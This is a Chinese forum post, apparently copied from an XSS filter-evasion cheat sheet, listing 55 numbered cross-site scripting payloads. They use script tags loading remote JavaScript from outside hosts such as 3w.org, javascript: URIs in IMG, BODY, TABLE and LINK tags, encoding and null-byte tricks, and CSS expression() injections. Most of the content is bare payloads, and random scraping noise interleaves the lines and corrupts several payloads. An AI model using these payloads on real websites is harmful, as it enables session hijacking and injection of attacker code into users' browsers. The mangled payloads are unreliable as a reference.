(1)普通的XSS JavaScript注入* U1 x/ Y( T, b0 J% [5 I9 Q5 J. } [
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># f9 x* I- |: [1 ?
(99)另类弹框) `/ ] o8 j, y. x% x$ V1 L. w
<q/oncut=alert()>1
4 @3 b D7 i9 k0 _& k( l4 Z<s/onclick=alert()>b
2 o" O! ?" x' Z* ~ o <XSS=" onclick="alert(1)//">clickme</SSX=">5 B8 i! `7 c; S+ m
<zzz onclick=alert`1`>clickme</zzz>
7 b" I0 m2 Q3 Z; I <a onclick=alert`1`>clickme</a>5 j+ c. ?( K( ?3 m5 Q$ o
<a=">clickme</a=">4 u+ G7 _: \: t8 h2 Q
<a=">clickme</a>2 C6 W. U0 z+ G/ V
<z=">clickme</z=">1 _: ^" D1 E# U3 f
<z onclick=alert`1`>clickme</z>/ n- p9 G8 \" Y3 `0 q1 @
0 f$ R. M% Q q/ r% y
(2)IMG标签XSS使用JavaScript命令2 \$ t. u0 F: D! u/ U- B1 h6 I
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( w: x' j( T/ G1 U2 O+ v2 A: C4 U
; ^% O$ ^3 X' H/ R. | i
(3)IMG标签无分号无引号" h# r2 M5 e3 |% N
<IMG SRC=javascript:alert(‘XSS’)>
% }4 |2 ?5 ?' q$ ^; c; P, L6 s5 T. F( E+ S% A% F5 _
(4)IMG标签大小写不敏感3 z7 k# h- Q; M7 u N( y
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
) q0 p( {! D- Y' C% H% U9 M0 I. W0 j
(5)HTML编码(必须有分号)
+ s& s% O- k* w/ t5 ~# p. o5 E<IMG SRC=javascript:alert(“XSS”)>
3 o, d. X6 z3 v1 B% k6 b9 K% \- D1 b" b0 g
(6)修正缺陷IMG标签
/ Y: F9 b0 F3 ?# V$ ^ h& o% v<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
) Q* N9 m. {7 B8 D- S+ y1 Q6 f! P* t& B1 q0 o2 @* @: G. M
(7)formCharCode标签(计算器)+ A* G2 P* U( {: J9 I. c5 t
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
# S. @2 s& t) w2 n& i' w' X5 |4 u h9 n4 V. A: F* w2 g
(8)UTF-8的Unicode编码(计算器)2 j, s7 I' C$ ~% |$ v5 L% b7 u
<IMG SRC=jav..省略..S')>
; t) S* o5 i' i5 u; m+ ?3 w( D0 Q' @5 w" `' D) M" l' j& ]: X, D# }
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)9 d# c. y6 j( \
<IMG SRC=jav..省略..S')>
% {8 _; o I e$ H: L6 x) K+ |4 O* F
(10)十六进制编码也是没有分号(计算器)! ?" D+ ~7 T) D- V: T9 o
<IMG SRC=\'#\'" /span>9 z% q$ }' h$ P# {9 J$ e/ l
' A" ?9 J2 y0 l: Q(11)嵌入式标签,将Javascript分开: m$ M5 F; q4 O& \: t9 n7 a
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>' d0 c) }/ y7 Z/ l: ^( m
& _" ^9 F2 ^% G/ y2 T7 q(12)嵌入式编码标签,将Javascript分开
7 Z% Y& D1 I' G; o* R0 u6 v" Z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
# R5 E$ V- ]' s- M8 W
# a* m) a' y5 Z% y* g(13)嵌入式换行符
T9 K7 O6 q/ U3 [) V5 |4 T7 l<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
( S% D; d" i' z0 z8 ~1 f& [, e
L7 ^+ G* g6 ^! P0 e/ L& |% b! _(14)嵌入式回车 N. p# m+ n! Z. z3 O2 C# L
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>4 n* S e* I7 `- x
0 N" A. c, y+ A* I+ f7 P(15)嵌入式多行注入JavaScript,这是XSS极端的例子3 J: p- t: @; f8 b. H3 i2 {0 ^( Z
<IMG SRC=\'#\'" /span>, ?1 s6 {6 N0 I K t" \
' i7 r: ?! y5 Z(16)解决限制字符(要求同页面)1 _; I8 H1 T) X0 ? N
<script>z=’document.’</script>! U( y3 F; V* G _
<script>z=z+’write(“‘</script>- |- i/ P6 q/ }( c( Z
<script>z=z+’<script’</script>
/ t m2 t9 d% F9 C<script>z=z+’ src=ht’</script>
( k1 F) C' c8 N<script>z=z+’tp://ww’</script>, v* q. O6 j( Z+ o. B
<script>z=z+’w.shell’</script>9 q7 j! G/ B1 |* w
<script>z=z+’.net/1.’</script>
! N* s& k: z* `<script>z=z+’js></sc’</script>7 j5 M$ u2 L+ I" ~5 q4 `, j0 ]
<script>z=z+’ript>”)’</script>5 h' E. i# X* C
<script>eval_r(z)</script> t3 N* U0 z7 P6 T" i4 v/ B# ?) S
3 ?5 W0 H; d) D2 Z' C
(17)空字符
4 }3 L/ V( T# N6 q# n& n$ Pperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out- J- t! D7 q5 `
8 K& u9 S5 r! p# |8 Q3 ]' D/ L" }(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用' R: I$ z; V+ h. S+ p5 H
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
+ o' _0 P# |( p5 ]9 l' h, y& G8 Y% X- M r9 v0 m* n8 r( h% L, Q
(19)Spaces和meta前的IMG标签0 @% Q% @9 s: y
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>% I; P0 ] s0 j# W9 v( b' z
$ o! y4 C2 I( [1 i(20)Non-alpha-non-digit XSS
8 e& w3 r! v" U& j<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT> U* u; q7 W' x- X. h
8 J8 C; s E5 K5 U0 `5 b. L
(21)Non-alpha-non-digit XSS to 2& c5 o1 `* o6 b5 l1 G
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
! L- X8 _8 U* I# _' C9 K5 M% ?! t
% O4 j4 t1 F7 K$ b5 i(22)Non-alpha-non-digit XSS to 3& v! t% p" C1 j" D9 m0 A4 S9 g
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
6 N% w6 R, V6 U9 {0 o/ [. h
0 }* f, g% o, A1 g% N& @( ^(23)双开括号& a r1 J$ s: ^0 E" C1 m
<<SCRIPT>alert(“XSS”);//<</SCRIPT> i8 t6 E" P* @+ n5 ^- S/ [9 H
2 ?3 z( w7 [2 R2 W( ^ v* P8 Z8 p(24)无结束脚本标记(仅火狐等浏览器)+ ^" V3 W3 o/ C4 r) L
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 i; t& j _) |7 ?) q$ i8 ^) L
% L/ r* Z. _0 I3 p, B) i ?
(25)无结束脚本标记2
* V+ o1 k1 ?* s. J7 H<SCRIPT SRC=//3w.org/XSS/xss.js>6 x! f, o! h& l
' W2 f, o% q. t/ h9 E(26)半开的HTML/JavaScript XSS6 Q# u$ C5 O U+ i7 h
<IMG SRC=\'#\'" /span>
* w1 R4 A! W' ?( y; g! h# L$ z
* h0 i+ w! y) B3 e(27)双开角括号3 E G! L6 f5 o( M! B' H* v0 D# f$ \
<iframe src=http://3w.org/XSS.html <5 K# z! d( [0 V% O6 q
2 j9 E/ \) o5 O( W, U3 k(28)无单引号 双引号 分号% i0 |( F( a* L( A4 j9 A7 j( F: K
<SCRIPT>a=/XSS/
! b4 j! R( z/ v: j1 g8 talert(a.source)</SCRIPT>4 q m8 a+ N7 O# Q7 O) a
' T. K( p9 b h/ i5 V3 ]; m! X4 n(29)换码过滤的JavaScript
: b$ w( r6 ~5 M/ W\”;alert(‘XSS’);//2 U! N0 N* G$ u( r3 y2 _7 }! }
1 a; ^4 }/ u3 ?. z+ ]6 w
(30)结束Title标签6 K" g) c8 ~& M2 Y
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
) Z4 S3 S& F- T: C8 \3 z1 n6 r2 q9 a5 m$ G6 z
(31)Input Image
- Y% E) g% b1 H7 L. G! \7 G<INPUT SRC=\'#\'" /span># i# n% |; `1 i8 a) |9 H% P
; E) c. `- V' R- r0 a0 Y
(32)BODY Image
0 ^) |' m2 @+ i) b6 J8 X! d$ K N<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
% ~( n" Y+ Q) W6 j4 ]; b5 V/ W4 d- e& G
(33)BODY标签
5 c( X X9 A+ ~" x) h1 T& n' L<BODY(‘XSS’)>1 x, v' L9 w8 F5 b* J
9 ]9 S J1 D) J: o+ t
(34)IMG Dynsrc& |' G6 N' B Y7 G& a
<IMG DYNSRC=\'#\'" /span>
) O3 Y1 B# y! X: g+ T2 o& W: y( |& s* T7 K7 p" ^4 T- x
(35)IMG Lowsrc! [* u y4 t! i4 [1 s
<IMG LOWSRC=\'#\'" /span>
0 b( P1 P; U! p- ^( z0 D. D* x6 r# I& Y- `
(36)BGSOUND6 {' m, B* a- V1 N. O) d" e7 X2 ~
<BGSOUND SRC=\'#\'" /span>
; w4 q& E% D6 E6 L/ g
; l0 ~! H: E! s) O% t. C) Q5 `2 j5 {(37)STYLE sheet+ U6 v3 N7 o' Z/ a r, ~- o
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>& `9 W7 A/ C+ r8 r8 m5 s; r0 Y+ J
4 b5 b# A+ s/ P* `(38)远程样式表
( |0 p4 u9 O; M ]4 T$ a8 f<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>1 [. F+ J( ?( t$ y; N2 C6 [
4 k* t) v( L% d(39)List-style-image(列表式)
% a0 p3 x- n- n<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS$ ]4 W3 l6 T3 a! J6 J5 Z. }8 N
3 k: O( a5 D* [- y9 o5 Z0 O$ ]! K
(40)IMG VBscript) D9 `( S+ x" V$ A0 \3 L
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
3 M7 v. f$ f9 [! r, W+ `+ S- U+ U# j
" D5 v4 F! J: o# n! \(41)META链接url6 t7 l2 l U0 i s. }3 T
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>9 e& W* C! F& X/ e
% u( V$ d. }' }$ X' ~2 f
(42)Iframe* M+ e/ @7 m3 o; ~
<IFRAME SRC=\'#\'" /IFRAME>9 {6 D0 N* @# F/ d0 p
6 X, l9 w, u# k: b4 P# U1 @
(43)Frame
- l' ^6 b0 B3 x% F4 T1 @6 C4 o<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>; Z; |6 Y- \1 I3 T
* j/ I! Z/ E$ u% d; H(44)Table( p0 y- n. |6 {6 L* K
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
$ H2 t! s% P. X$ \. ^! a) y: V5 O8 T8 n# N! }2 ~! O
(45)TD
) d+ |( U' Q5 T' J0 i! j7 t<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>9 C% [, ~& p% R: Y2 h V! \
6 I" C6 u, ?9 V4 s' `1 f
(46)DIV background-image$ O! C/ E) t9 t* z- o- Z2 c
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( n" @9 I, |1 m2 _+ \: _1 k; R# k, ]% _- A& _2 p
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
: Y. B& D1 q4 A9 T9 Z$ D<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
! G% q1 F0 Q; ?* x+ D8 A0 i" z
/ L3 h6 O' a: ~. Y% ^3 p(48)DIV expression
* c8 k) e* l" i% u0 J# Q3 O2 i<DIV STYLE=”width: expression_r(alert(‘XSS’));”>. A$ r+ L. U. ^5 D- c1 b
: c/ q# o$ {' R8 C ]! M, M0 K
(49)STYLE属性分拆表达2 o5 K5 O) T& \$ q4 T1 w' R
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
4 P7 A# ]& F( F8 P7 e. h
5 D7 H( q; B3 y: E$ k! ]2 ^, g G(50)匿名STYLE(组成:开角号和一个字母开头)
+ r* H! Z9 W% H+ q* T<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>, g ]8 w3 x5 a, ]* \- y3 H- c
: u P) Z2 z6 k/ T1 G' u(51)STYLE background-image/ y7 f2 [$ y# j; h# _+ Z
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
: d: Z# ]' k4 `$ R! C4 C( S
- O& j! S+ M2 I(52)IMG STYLE方式
: i; g: G4 _+ `' Q) D" a3 c, k2 dexppression(alert(“XSS”))’>
1 d% Z1 W/ d& A* Z) s8 W7 A/ I: X# V2 U, z b; k
(53)STYLE background
# O3 q5 m/ \# S<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* F* v" k1 f( D8 Y! ~8 H/ S7 r E m# h5 q
(54)BASE1 p0 {* [, |& v, O/ t5 a( c
<BASE HREF=”javascript:alert(‘XSS’);//”>8 _7 k Z( w) _4 w! u6 E
. b6 o1 b6 f& Y! E! O(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS5 }9 F0 U) D6 P. H L Q& X
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
6 w/ I8 @' X6 A8 D4 J( T c; s; X |
发表于 2016-4-28 10:06:15
收藏
支持
反对